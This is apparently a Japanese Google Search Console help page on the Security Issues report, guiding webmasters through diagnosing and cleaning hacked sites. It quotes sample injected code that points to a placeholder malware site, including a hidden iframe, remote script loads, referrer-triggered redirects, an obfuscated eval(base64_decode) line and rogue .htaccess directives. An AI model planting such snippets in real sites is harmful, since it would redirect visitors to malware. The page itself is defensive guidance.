[セキュリティの問題] レポート

Google による評価の結果、サイトがハッキングされている、または訪問者やそのパソコンに損害を与えそうな動作が検出された場合、[セキュリティの問題] レポートに Google の調査結果が表示されます。有害な動作の例としては、フィッシング攻撃、ユーザーのパソコンへのマルウェアや望ましくないソフトウェアのインストールが挙げられます。

ページやサイトがセキュリティの問題の影響を受けている場合、検索結果に警告ラベルが追加されたり、ユーザーがそのページにアクセスしようとすると、ブラウザでインタースティシャルな警告ページが表示されたりします。

[セキュリティの問題] レポートを開く

 

セキュリティの問題とは

セキュリティの問題は次のカテゴリに分類されます。

  • ハッキングされたコンテンツ: サイトにセキュリティ上の脆弱性があるために、ウェブマスターの許可なくサイト上に置かれたコンテンツ。Google では、ユーザーを保護するため、ハッキングされたコンテンツが検索結果に含まれないようにすべく最善を尽くしています。詳細
  • マルウェアや望ましくないソフトウェア: デバイスやそのユーザーに害を及ぼすよう設計されたソフトウェア、不正な行為や予期しない行為に関与しているソフトウェア、ユーザーに悪影響を及ぼすソフトウェア。詳細
  • ソーシャル エンジニアリング: 機密情報の公開やソフトウェアのダウンロードなど、訪問者をだまして危険な行為に誘導するコンテンツ。詳細

自分のサイトにセキュリティの問題があるかどうか

セキュリティの問題がある場合は、サイト上のセキュリティの問題の総数がレポートの上部に表示されます。

サイト上にセキュリティの問題がない場合は、緑色のチェックマークと適切なメッセージが表示されます。

サイトを最近購入した場合

以前からセキュリティの問題があったサイトを最近購入した場合は、[セキュリティの問題] レポートに記載されている問題を修正したうえで、サイトを最近取得したこと、現在は Google ウェブマスター向けガイドラインに準拠していることを再審査リクエストでお知らせください。

影響を受けているページ

問題の説明を展開して、影響を受けている URL の例の一覧を表示します。この一覧は網羅的なものではなく、選択した問題の影響を受けているサイト上のページのサンプルのみが表示されます。場合によっては、セキュリティの問題に URL の例が表示されないこともあります。これは影響を受けているページがないわけではなく、なんらかの理由でサンプルを生成できなかったためです。

問題の詳細には、サイトでその問題が初めて検出された日付、短い説明、問題の詳細をさらに確認するためのリンクが表示されます。

問題を修正する

サイトのセキュリティの問題を修正するには:

  1. [セキュリティの問題] レポートで問題の説明を展開します。
  2. 問題の説明を読み、[詳細] リンクをクリックして、詳細情報と問題を修正するための手順を確認します([詳細] はこのページの下部にある説明にリンクしています)。
  3. 詳細情報で示されている該当ページのサンプルを利用して、問題のトラブルシューティングを行い、修正します。この一覧は網羅的なものではなく、問題の影響を受けているサイト上のページのサンプルのみが表示されます。場合によっては、セキュリティの問題に URL の例が表示されないこともあります。これは影響を受けているページがないわけではなく、なんらかの理由でサンプルを生成できなかったためです。
  4. サイト全体で問題を修正します。 一部のページでのみ問題を解決しても、検索結果は変わりません。
  5. レポートに複数の問題が表示されている場合は、すべての問題を修正してください。
  6. 修正をテストします。
  7. レポートに記載されているすべての問題すべてのページで修正したら、[セキュリティの問題] レポートで [審査をリクエスト] を選択します。再審査リクエストには、修正した内容を記述します。再審査リクエストを明快なものにするために、次の 3 つの点にご留意ください。
    • サイトの品質に関する問題を正確に説明する。
    • 問題を修正するために行った手順を記述する。
    • 取り組みの結果を記述する。
  8. 再審査には 1〜2 週間程度かかります。進行状況はメールでお知らせします。再審査リクエストを送信すると、審査が進行中であることを伝える確認メッセージが届きます。リクエストに対する最終決定が通知されるまではリクエストを再送信しないでください。

再審査にかかる期間

1~2 週間程度かかります。Google にリクエストが届き次第、メールでお知らせしますので、審査が開始されたことを確認できます。審査が完了したときにもメールをお送りします。

リクエストに対する決定が通知されるまではリクエストを再送信しないでください。問題を修正していない時点で再審査リクエストを送信すると、次のリクエストの結果連絡までの時間が長くなったり、違反を繰り返すサイトとしてマークされたりする可能性があります。

セキュリティの問題の一覧

セキュリティの問題の一覧と各問題の修正方法に関する情報は以下のとおりです。

不正なページ

機密情報の公開やソフトウェアのダウンロードなど、訪問者をだまして危険な行為に誘導するコンテンツがサイトに含まれています。Google セーフ ブラウジングでは、不正なコンテンツを表示し続けるページにユーザーがアクセスする前に警告を表示することで、ウェブユーザーを保護しています。

ウェブページは次の場合に不正と見なされます。

  • 信頼できる存在(ユーザーのデバイスやブラウザ、ウェブサイト自体など)の挙動やデザインを模倣している
  • ユーザーをだまして、信頼できる存在に対してのみ行うような行為(パスワードの共有、テクニカル サポートへの電話、ソフトウェアのダウンロードなど)に誘導しようとしている

このタイプの不正なコンテンツはソーシャル エンジニアリングと呼ばれます。ソーシャル エンジニアリングの詳細不正なページの例をご確認ください。

問題を修正する

1. 問題を確認する

ページの例にアクセスして、不正なコンテンツがあるかどうか確認します。URL 検査ツールを使用すると、モバイルとパソコンの両方の表示でサイトを確認できます。

2. ページを修正する

ソーシャル エンジニアリングに関与しているページがあれば修正します。セーフ ブラウジングで誤って不正なサイトとして分類されているウェブページがある場合は、こちらからご報告ください。

3. 再審査をリクエストする

サイトで問題が修正されていることを確認したら、[セキュリティの問題] レポートでセキュリティ審査をリクエストします。審査が完了するまでに数日から数週間かかることがあります。

不正な埋め込みリソース

機密情報の公開や望ましくないソフトウェアのダウンロードなど、訪問者をだまして危険な行為に誘導する不正な広告や埋め込みリソースがサイトに含まれています。不正なコンテンツは、ページに埋め込まれたリソース(画像、他のサードパーティ コンポーネント、広告など)を介して含まれる場合があります。Google セーフ ブラウジングでは、不正なコンテンツを表示し続けるページにユーザーがアクセスする前に警告を表示することで、ウェブユーザーを保護しています。

このコンテンツはホストページで表示される場合もありますが、別の事例として、ホストサイトには表示可能な広告は含まれておらず、ポップアップやポップアンダーなど、さまざまなリダイレクト手法を通じてユーザーを悪質なページに誘導する場合もあります。いずれの場合も、このタイプの埋め込みコンテンツはホストページのポリシー違反となります。

このタイプの不正なコンテンツはソーシャル エンジニアリングと呼ばれます。ソーシャル エンジニアリングの詳細不正な埋め込みリソースの例をご確認ください。

問題を修正する

1. 問題を確認する

ページの例にアクセスして、不正なコンテンツがあるかどうか確認します。サイトのページ上にある広告、画像、その他のサードパーティによる埋め込みリソースが偽物でないことを確認します。広告ネットワークの場合、サイトのページ上で広告をローテーション表示していることがあります。そのため、ソーシャル エンジニアリング広告が表示されるまでにページを数回更新する必要がある場合があります。広告によっては、モバイル デバイスとパソコンで表示が異なるものもあります。URL 検査ツールを使用すると、モバイルとパソコンの両方の表示でサイトを確認できます。

2. 不正な広告やリソースを削除する

サイトに含まれるサードパーティのリソースを確認します。サイトのページ上にある広告、画像、その他のサードパーティによる埋め込みリソースが偽物でないことを確認します。ソーシャル エンジニアリングに関与しているページがあれば修正します。

3. 再審査をリクエストする

サイトで問題が修正されていることを確認したら、[セキュリティの問題] レポートでセキュリティ審査をリクエストします。審査が完了するまでに数日から数週間かかることがあります。

マルウェア
サイトは悪意のあるハッカーのマルウェアに感染しているか、マルウェアをホストしています。マルウェアとは、パソコンやモバイル デバイス、そこで実行されているソフトウェアやそのユーザーに損害を与えるように設計されたソフトウェアやモバイルアプリのことです。

1. 自分で修正できる問題かどうかを判断する

サイト上のマルウェアの問題を修正するには、コードの読解力が必要であり、場合によってはサイトのウェブサーバーについての知識も求められます。この点が負担に感じる場合は、サポートチームの構築に目を通して、サポートを受ける方法をご確認ください。

2. マルウェアの問題を診断して修正する

マルウェアにはさまざまなタイプがあります。以下の項目を読み、特定のタイプのマルウェアを診断して修正してみてください。サイトが複数のタイプのマルウェアに感染している場合もありますので、診断やサイトの修正は徹底的に行ってください。

マルウェアのタイプ: サーバー設定

説明

サーバーの設定ファイルの変更などによって、ハッカーがサイトを侵害し、サイトの訪問者を通常のサイトからマルウェアの不正サイトにリダイレクトしています。通常、サーバー設定ファイルでは、サイト管理者がウェブサイトの特定のページやディレクトリへの URL リダイレクトを指定できるようになっています。たとえば、Apache サーバーでは .htaccess ファイルと httpd.conf ファイルが該当します。

問題を修正する

1. 問題を確認する

[セキュリティの問題] レポートに表示されている URL の例にアクセスします。

ブラウザを使って、サイトの感染したページを直接表示することはおやめください。

マルウェアはブラウザの脆弱性を利用して広がる場合が多いため、マルウェアに感染したページをブラウザで開くと、お使いのパソコンに被害が及ぶおそれがあります。また、ハッカーは、サイト所有者に見つかることを避けるため、クローキングの手法を使ってスパム コンテンツを隠す場合があります。

パソコンでコンテンツをより安全に表示するには、他に次の 2 つの方法があります。

  • URL 検査ツールを使用して、Google が認識しているページを表示します。多くのハッカーは Google マシンのみで確認できるような変更を行うため、これは便利です。たとえば、サイトにハッカーのサイトへのリンクが追加されていても、リファラーが Google でなければ、表示されない場合があります。
  • コマンドラインから cURL または Wget を使って、HTTP リクエスト(ページの取得など)を実行します。無料で入手できるこうしたツールは、リダイレクトの診断に便利なうえ、リファラーやユーザー エージェントの情報を指定できます。ハッカーは検出されることを避けるため、多くの場合、特定のユーザー エージェントやリファラーのみに攻撃を仕掛け、都合の良い標的を選びます。このようなツールを使用すると、自らを標的として装うことができます。リクエストしてもスパム行為が誘導されない場合は、別のリファラー アドレス(大規模なウェブサイトや別の検索エンジンからのリンクなど)を使用してみてください。たとえば、Windows マシンで Google 検索結果から www.example.com/page へのリンクをたどるユーザーを装う場合は、次のように cURL を使用します。

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

「サーバー設定」タイプに感染しているページからの応答には、次のようなヘッダーが含まれる可能性があります。

...
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<malware-attack-site>/index.html
< Content-Length: 253
...

2. サイトから「サーバー設定」マルウェアを排除する

シェルやターミナルからアクセスしてサーバーにログインし(サイトはオフラインのままでもかまいません)、関連するサーバー設定ファイルを確認します。サイトにはハッキングされた複数のサーバー設定ファイルがある可能性があります。このようなファイルにリダイレクトなど、不要なディレクティブがないかどうかを確認します。ハッカーがこうしたディレクティブを使って、知られていないマルウェアの不正サイトにリダイレクトするようにサイトを設定することがあります。たとえば、.htaccess ファイルでは、次のようなリダイレクトがある可能性があります。

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<malware-site>/index.html [R=301]

 

さらに、以下を確認します。

  • ファイルの最後にハッカーがコードを追加している場合に備えて、ファイル全体を確認します。ファイルの最後は見落としやすいので注意します。
  • ハッカーが .htaccess ファイルを何度も更新するように作成した cron ジョブがないかどうかを調べます。cron ジョブは /etc/crontab(またはさまざまな /etc/cron* ディレクトリ)や /var/spool/cron などの複数の場所に設定されていることがあります。
  • ハッキングされた場合のガイドを読み、クリーンアップの手順やサイトが再びハッキングされないようにするためのヒントなど、サイトの包括的な修正フローを確認します。
マルウェアのタイプ: SQL インジェクション

説明

ハッカーがサイトのデータベースを侵害した可能性があります。たとえば、ハッカーがデータベース テーブルの各レコードに悪意のあるコードをプログラムによって組み込むことがあります。その結果、データベースからの情報が必要なページをサーバーが読み込むと、そのページのコンテンツに埋め込まれた悪質なコードによって、サイトの訪問者に被害が及ぶおそれがあります。

問題を修正する

1. 問題を確認する

影響を受けている URL に対してコマンドラインでクエリを実行し、応答に「iframe」や「eval」などの SQL 攻撃の単語が含まれていないか確認します。

ブラウザを使って、サイトの感染したページを直接表示することはおやめください。

マルウェアはブラウザの脆弱性を利用して広がる場合が多いため、マルウェアに感染したページをブラウザで開くと、お使いのパソコンに被害が及ぶおそれがあります。また、ハッカーは、サイト所有者に見つかることを避けるため、クローキングの手法を使ってスパム コンテンツを隠す場合があります。

パソコンでコンテンツをより安全に表示するには、他に次の 2 つの方法があります。

  • URL 検査ツールを使用して、Google が認識しているページを表示します。多くのハッカーは Google マシンのみで確認できるような変更を行うため、これは便利です。たとえば、サイトにハッカーのサイトへのリンクが追加されていても、リファラーが Google でなければ、表示されない場合があります。
  • コマンドラインから cURL または Wget を使って、HTTP リクエスト(ページの取得など)を実行します。無料で入手できるこうしたツールは、リダイレクトの診断に便利なうえ、リファラーやユーザー エージェントの情報を指定できます。ハッカーは検出されることを避けるため、多くの場合、特定のユーザー エージェントやリファラーのみに攻撃を仕掛け、都合の良い標的を選びます。このようなツールを使用すると、自らを標的として装うことができます。リクエストしてもスパム行為が誘導されない場合は、別のリファラー アドレス(大規模なウェブサイトや別の検索エンジンからのリンクなど)を使用してみてください。たとえば、Windows マシンで Google 検索結果から www.example.com/page へのリンクをたどるユーザーを装う場合は、次のように cURL を使用します。

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

次に、データベース サーバーにログインするか、phpMyAdmin などのツールを使ってデータベースを表示します。Wget または cURL を使った場合は、これらのツールで確認したページのソースコード上の改変部分と実際のデータベース エントリを対応させてみます。たとえば、ページに疑わしい iframe があるのに気付いた場合、iframe コードを検索する SQL クエリを実行します。次に例を示します。

SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%'; 

サーバー上でデータベースのログファイルやエラーファイルを調べて、予期しない SQL コマンドなど、通常のユーザーやエラーでは異常と思われるアクティビティがないかどうかを確認することもおすすめします。

2. サイトをクリーンアップする

サイトをクリーンアップする準備ができたら、感染したデータベースの各レコードを更新するか、最後にバックアップしたデータベースに戻すことができます。

さらに、以下を確認します。

マルウェアのタイプ: コード インジェクション

説明

サイト上のページが変更され、マルウェアの不正サイトへの iframe など、悪質なコードが含まれています。

問題を修正する

1. 問題を確認する

[セキュリティの問題] レポートに記載された、感染している URL にアクセスします。応答の HTML を確認して悪質なコードがないか調べます。

ブラウザを使って、サイトの感染したページを直接表示することはおやめください。

マルウェアはブラウザの脆弱性を利用して広がる場合が多いため、マルウェアに感染したページをブラウザで開くと、お使いのパソコンに被害が及ぶおそれがあります。また、ハッカーは、サイト所有者に見つかることを避けるため、クローキングの手法を使ってスパム コンテンツを隠す場合があります。

パソコンでコンテンツをより安全に表示するには、他に次の 2 つの方法があります。

  • URL 検査ツールを使用して、Google が認識しているページを表示します。多くのハッカーは Google マシンのみで確認できるような変更を行うため、これは便利です。たとえば、サイトにハッカーのサイトへのリンクが追加されていても、リファラーが Google でなければ、表示されない場合があります。
  • コマンドラインから cURL または Wget を使って、HTTP リクエスト(ページの取得など)を実行します。無料で入手できるこうしたツールは、リダイレクトの診断に便利なうえ、リファラーやユーザー エージェントの情報を指定できます。ハッカーは検出されることを避けるため、多くの場合、特定のユーザー エージェントやリファラーのみに攻撃を仕掛け、都合の良い標的を選びます。このようなツールを使用すると、自らを標的として装うことができます。リクエストしてもスパム行為が誘導されない場合は、別のリファラー アドレス(大規模なウェブサイトや別の検索エンジンからのリンクなど)を使用してみてください。たとえば、Windows マシンで Google 検索結果から www.example.com/page へのリンクをたどるユーザーを装う場合は、次のように cURL を使用します。

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

悪質なコードの例としては、次のようなものが挙げられます。

  • 悪質なサイトを読み込む iframe:
    <iframe frameborder="0" height="0" src="http://<malware-site>/path/file" 
      style="display:none" width="0"></iframe>
  • 不正サイトのスクリプトを呼び出して実行する JavaScript または他のスクリプト言語:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • 不正サイトにブラウザをリダイレクトするスクリプト:
    <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://<malware-site>/");
      }
    </script>
  • 検出を避けるためにわかりにくくした悪質なコード:
    eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • 元は無害なスクリプトに有害なコードをランダムに書き込むように設計された共有オブジェクト ファイル:
    #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

サイトに存在する有害なおそれのあるコードをすべて調べます。iframe コードを見つけるには、「iframe」などの単語を検索すると便利です。他にも「script」、「eval」、「unescape」がキーワードとして役立ちます。たとえば、Unix ベースのシステムですべてのファイルを対象に「iframe」を検索するコマンドは次のとおりです。

$grep -irn "iframe" ./ | less

2. サイトをクリーンアップする

サイトをクリーンアップする準備ができたら、影響を受けたファイルを正常な最後のバックアップで置き換えるか、各ページのコード インジェクションと、関連するすべてのスクリプト関数やファイルを削除できます。サーバーの設定ファイルを変更した場合は、変更を有効にするためにウェブサーバーを再起動する必要があります。

さらに、以下を確認します。

マルウェアのタイプ: エラー テンプレート

説明

エラー メッセージ(「404 ファイルが見つかりません」など)に使用されるテンプレートがマルウェアを配布するように設定されています。この方法で、悪意のあるユーザーがサイトには含まれない URL でも攻撃を開始することがあります。

問題を修正する

1. 問題を確認する

サイト上に存在しないページや別のタイプのエラーが発生するページをリクエストし、応答が別のサイトから送信されているかどうか、応答にマルウェアが含まれていないかを確認します。

ブラウザを使って、サイトの感染したページを直接表示することはおやめください。

マルウェアはブラウザの脆弱性を利用して広がる場合が多いため、マルウェアに感染したページをブラウザで開くと、お使いのパソコンに被害が及ぶおそれがあります。また、ハッカーは、サイト所有者に見つかることを避けるため、クローキングの手法を使ってスパム コンテンツを隠す場合があります。

パソコンでコンテンツをより安全に表示するには、他に次の 2 つの方法があります。

  • URL 検査ツールを使用して、Google が認識しているページを表示します。多くのハッカーは Google マシンのみで確認できるような変更を行うため、これは便利です。たとえば、サイトにハッカーのサイトへのリンクが追加されていても、リファラーが Google でなければ、表示されない場合があります。
  • コマンドラインから cURL または Wget を使って、HTTP リクエスト(ページの取得など)を実行します。無料で入手できるこうしたツールは、リダイレクトの診断に便利なうえ、リファラーやユーザー エージェントの情報を指定できます。ハッカーは検出されることを避けるため、多くの場合、特定のユーザー エージェントやリファラーのみに攻撃を仕掛け、都合の良い標的を選びます。このようなツールを使用すると、自らを標的として装うことができます。リクエストしてもスパム行為が誘導されない場合は、別のリファラー アドレス(大規模なウェブサイトや別の検索エンジンからのリンクなど)を使用してみてください。たとえば、Windows マシンで Google 検索結果から www.example.com/page へのリンクをたどるユーザーを装う場合は、次のように cURL を使用します。

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

2. サイトをクリーンアップする

ウェブサーバーにログインし、サーバー設定ファイルでエラーページのディレクティブを検索します。たとえば Apache ウェブサーバーでは、.htaccess ファイルでエラー テンプレートが宣言されます。悪意のあるサイトから 404 エラーページを取得する .htaccess ファイル エントリの例は次のとおりです。

ErrorDocument 404 http://<malware-site>/index.html 

サイトをクリーンアップする準備ができたら、正常なバックアップで .htaccess ファイルを置き換えるか、既存の .htaccess ファイルから不要な ErrorDocument ディレクティブを削除します。サイト上にエラーファイルがある場合は、実際に使用するエラーファイルをクリーンアップすることにも注意します。最後にウェブサーバーを再起動して、すべての変更を反映させます。

さらに、以下を確認します。

マルウェアのタイプ: クロスサイト マルウェア

説明

サイトは悪質なコンテンツを含むことが確認されているウェブサイトからコンテンツを読み込んでいます。Chrome では、次のような画像のブラウザ インタースティシャルが表示されます。

cross-site malware warning

問題を修正する​

  1. [セキュリティの問題] レポートに表示されている URL の例にアクセスして問題を確認します。クロスサイト マルウェアの問題に該当する場合は、上の画像が表示されます。
  2. ブラウザの警告には、疑わしいコンテンツのドメインが記載されています。ブラウザの警告に表示されているマークされたサイトへの参照をすべて削除します。
  3. 自分のサイトのページにマークされたサイトのコンテンツが知らないうちに含まれていることに気づいた場合、問題はより深刻であり、サイトは侵害されている可能性が高くなります。いずれの場合も、ハッキングされたサイトに関するヘルプの復旧プロセスに従って、サイトを孤立させ、被害を評価して、サイトをクリーンアップするようおすすめします。
  4. サイトからソーシャル エンジニアリング コンテンツをすべて削除したら、[セキュリティの問題] レポートでセキュリティ審査をリクエストします。審査が完了するまでに数日から数週間かかることがあります。
  5. マークされた正当なサイトのコンテンツを意図的に含めていて、マークされたサイトがクリーンアップされた後でコンテンツを再び含めたい場合は、そのサイトの Google セーフ ブラウジング診断ページ(http://www.google.com/safebrowsing/diagnostic?site=www.example.com)を使ってサイトのステータスを確認することができます。正当なサイトは大抵の場合、所有者によってすぐにクリーンアップされます。
その他のタイプのマルウェア

サイトに影響を与える可能性がある他のタイプのマルウェアも多数あります。他のタイプのハッキングを診断して修正するためのヒントについては、ウェブの基礎のサイトをご覧ください。サイトを修正したら、審査をリクエストしてください。

3. 再審査をリクエストする

サイトで問題が修正されていることを確認したら、[セキュリティの問題] レポートでセキュリティ審査をリクエストします。審査が完了するまでに数日から数週間かかることがあります。

ハッキングのタイプ: コード インジェクション

ハッカーがサイトを侵害し、ページに悪意のあるコードを注入しています。例としては、悪意のあるサイトへリダイレクトしたり、ページが開いている間にブラウザ上で暗号通貨マイニング ソフトウェアを実行したりします。

1. 自分で修正できる問題かどうかを判断する

サポートチームの構築に目を通し、この問題を自分で修正するには何が必要か、自分のスキルでは難しいと思う場合はどのように支援を受けるかをご確認ください。

2. 問題を確認する

ブラウザを使って、サイトの感染したページを直接表示することはおやめください。

マルウェアはブラウザの脆弱性を利用して広がる場合が多いため、マルウェアに感染したページをブラウザで開くと、お使いのパソコンに被害が及ぶおそれがあります。また、ハッカーは、サイト所有者に見つかることを避けるため、クローキングの手法を使ってスパム コンテンツを隠す場合があります。

パソコンでコンテンツをより安全に表示するには、他に次の 2 つの方法があります。

  • URL 検査ツールを使用して、Google が認識しているページを表示します。多くのハッカーは Google マシンのみで確認できるような変更を行うため、これは便利です。たとえば、サイトにハッカーのサイトへのリンクが追加されていても、リファラーが Google でなければ、表示されない場合があります。
  • コマンドラインから cURL または Wget を使って、HTTP リクエスト(ページの取得など)を実行します。無料で入手できるこうしたツールは、リダイレクトの診断に便利なうえ、リファラーやユーザー エージェントの情報を指定できます。ハッカーは検出されることを避けるため、多くの場合、特定のユーザー エージェントやリファラーのみに攻撃を仕掛け、都合の良い標的を選びます。このようなツールを使用すると、自らを標的として装うことができます。リクエストしてもスパム行為が誘導されない場合は、別のリファラー アドレス(大規模なウェブサイトや別の検索エンジンからのリンクなど)を使用してみてください。たとえば、Windows マシンで Google 検索結果から www.example.com/page へのリンクをたどるユーザーを装う場合は、次のように cURL を使用します。

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

ハッカーがサイトの HTML ファイル(JavaScript リダイレクトなど)やサイトのコンテンツを生成するファイル(PHP ファイルなど)に、悪質なコードを直接挿入していることがあります。

レポートに表示されている侵害されたページを取得し、その応答を確認します。ハッカーは複数の手法を使用して、サイトからハッカーのサイトに訪問者をリダイレクトしている可能性があります。たとえば、次のような手法があります。

  • リダイレクト:​
    • ヘッダー リダイレクト: ハッカーはサーバーの設定ファイルを変更する方法で訪問者をリダイレクトする場合があります。通常、サーバー設定ファイルでは、サイト管理者がウェブサイトの特定のページやディレクトリへの URL リダイレクトを指定できるようになっています。たとえば、Apache サーバーでは .htaccess ファイルと httpd.conf ファイルが該当します。
      ...
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<malware-site>/index.html
      < Content-Length: 253
    • JavaScript リダイレクト:
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<malware-site>/");}
      <script>
  • 別のサイトから読み込まれた悪質な JavaScript:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • 検出を避けるためにわかりにくくした悪質なコード:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

応答やサイトで不審なコードがないか検索してください。「search」、「eval」、「base64_decode」、「unescape」がキーワードとして役立ちます。

3. サイトをクリーンアップする

サイトをクリーンアップする準備ができたら、影響を受けたファイルを正常な最後のバックアップで置き換えるか、自分でスパムのコンテンツを削除できます。

さらに、以下を確認します。

4. 再審査をリクエストする

サイトで問題が修正されていることを確認したら、[セキュリティの問題] レポートでセキュリティ審査をリクエストします。審査が完了するまでに数日から数週間かかることがあります。

ハッキングのタイプ: コンテンツ インジェクション

ハッカーがサイトのページにスパムのリンクやテキストを追加しました。挿入されるコンテンツには、医薬品用語や、サイトのコンテンツとは無関係のスパムなどが含まれています。

通常、ハッカーは次のいずれかの方法でサイトを変更します:

  • サーバー上の不安定なディレクトリへのアクセス権を入手する。たとえば、寛大な権限のディレクトリを、気づかずにそのままにする場合などです。
  • コンテンツ管理システムなど、サイトで実行されるソフトウェアの脆弱性を利用する。たとえば、Drupal、Joomla!、WordPress の以前の不安定なバージョンを実行している場合などです。
  • ユーザー カウンタなど、サイトで使用しているサードパーティ プラグインをハッキングする。

1. 自分で修正できる問題かどうかを判断する

サポートチームの構築に目を通し、この問題を自分で修正するには何が必要か、自分のスキルでは難しいと思う場合はどのように支援を受けるかをご確認ください。

2. 問題を確認する

ブラウザを使って、サイトの感染したページを直接表示することはおやめください。

マルウェアはブラウザの脆弱性を利用して広がる場合が多いため、マルウェアに感染したページをブラウザで開くと、お使いのパソコンに被害が及ぶおそれがあります。また、ハッカーは、サイト所有者に見つかることを避けるため、クローキングの手法を使ってスパム コンテンツを隠す場合があります。

パソコンでコンテンツをより安全に表示するには、他に次の 2 つの方法があります。

  • URL 検査ツールを使用して、Google が認識しているページを表示します。多くのハッカーは Google マシンのみで確認できるような変更を行うため、これは便利です。たとえば、サイトにハッカーのサイトへのリンクが追加されていても、リファラーが Google でなければ、表示されない場合があります。
  • コマンドラインから cURL または Wget を使って、HTTP リクエスト(ページの取得など)を実行します。無料で入手できるこうしたツールは、リダイレクトの診断に便利なうえ、リファラーやユーザー エージェントの情報を指定できます。ハッカーは検出されることを避けるため、多くの場合、特定のユーザー エージェントやリファラーのみに攻撃を仕掛け、都合の良い標的を選びます。このようなツールを使用すると、自らを標的として装うことができます。リクエストしてもスパム行為が誘導されない場合は、別のリファラー アドレス(大規模なウェブサイトや別の検索エンジンからのリンクなど)を使用してみてください。たとえば、Windows マシンで Google 検索結果から www.example.com/page へのリンクをたどるユーザーを装う場合は、次のように cURL を使用します。

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

サイトのページをいくつか取得して応答を検索し、不審なコンテンツや自分では追加していないリンクがないか調べます。たとえば、医薬品やスパムの用語(「バイアグラ」や「楽して稼ぐ」など)を検索します。

3. サイトをクリーンアップする

サイトをクリーンアップする準備ができたら、影響を受けたファイルを正常な最後のバックアップで置き換えるか、スパムのコンテンツやリンクを各ページから削除できます。[セキュリティの問題] レポートに表示されているハッキングの例をすべて修正してください。さらに、Google の「site:」検索を使用したり、ウェブサイトのソースファイルを検索したりして、サイト上にハッキングされている他のページがないか探します。

さらに、以下を確認します。

4. 再審査をリクエストする

サイトで問題が修正されていることを確認したら、[セキュリティの問題] レポートでセキュリティ審査をリクエストします。審査が完了するまでに数日から数週間かかることがあります。

ハッキングのタイプ: URL インジェクション

ハッカーがサイト上で新しいページを作成しています。多くの場合、スパム行為のある単語やリンクが含まれています。新しいページには、ユーザーを他のサイトにリダイレクトする、ウェブサーバーを他のサイトに対するサービス拒否攻撃に参加させるといった、意図しない動作を行うコードが含まれていることがあります。

1. 自分で修正できる問題かどうかを判断する

サポートチームの構築に目を通し、この問題を自分で修正するには何が必要か、自分のスキルでは難しいと思う場合はどのように支援を受けるかをご確認ください。

2. 問題を確認する

ブラウザを使って、サイトの感染したページを直接表示することはおやめください。

マルウェアはブラウザの脆弱性を利用して広がる場合が多いため、マルウェアに感染したページをブラウザで開くと、お使いのパソコンに被害が及ぶおそれがあります。また、ハッカーは、サイト所有者に見つかることを避けるため、クローキングの手法を使ってスパム コンテンツを隠す場合があります。

パソコンでコンテンツをより安全に表示するには、他に次の 2 つの方法があります。

  • URL 検査ツールを使用して、Google が認識しているページを表示します。多くのハッカーは Google マシンのみで確認できるような変更を行うため、これは便利です。たとえば、サイトにハッカーのサイトへのリンクが追加されていても、リファラーが Google でなければ、表示されない場合があります。
  • コマンドラインから cURL または Wget を使って、HTTP リクエスト(ページの取得など)を実行します。無料で入手できるこうしたツールは、リダイレクトの診断に便利なうえ、リファラーやユーザー エージェントの情報を指定できます。ハッカーは検出されることを避けるため、多くの場合、特定のユーザー エージェントやリファラーのみに攻撃を仕掛け、都合の良い標的を選びます。このようなツールを使用すると、自らを標的として装うことができます。リクエストしてもスパム行為が誘導されない場合は、別のリファラー アドレス(大規模なウェブサイトや別の検索エンジンからのリンクなど)を使用してみてください。たとえば、Windows マシンで Google 検索結果から www.example.com/page へのリンクをたどるユーザーを装う場合は、次のように cURL を使用します。

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

レポートに表示されている URL の例に対してクエリを実行し、アクティブな状態かどうかを確認します。これらのページは自分では作成していない可能性が高いので、サイト上からページを削除するか、ページを自動生成しているコードを排除する必要があります。該当するページを見つけてサイトから排除する方法についてご確認ください。

「site:」検索を実行して、自分では作成していないページを見つけることもできます。

  • 小規模なサイトでは、Google 検索で [site:example.com] という検索を実行すると、Google でインデックス登録されたページのリストが表示されるので、作成していないページが存在するかどうかを確認できます。
  • 大規模なサイトの場合は、次のような詳細なクエリを使用できます。
    • [site:example.com pharmacy] - example.com にある「pharmacy」という単語を含むページがすべて表示されます。他の一般的なスパム用語で置き換えてください。
    • [site:example.com/wp-admin/] - WordPress サイトのサイト管理者のセクションにあるすべてのページが表示されます。

3. サイトをクリーンアップする

サイトをクリーンアップする準備ができたら、影響を受けたディレクトリを正常な最後のバックアップで置き換えるか、望ましくないページや、ハッカーがそれらのページの作成に使用したファイルや関数を削除できます。

さらに、以下を確認します。

4. 再審査をリクエストする

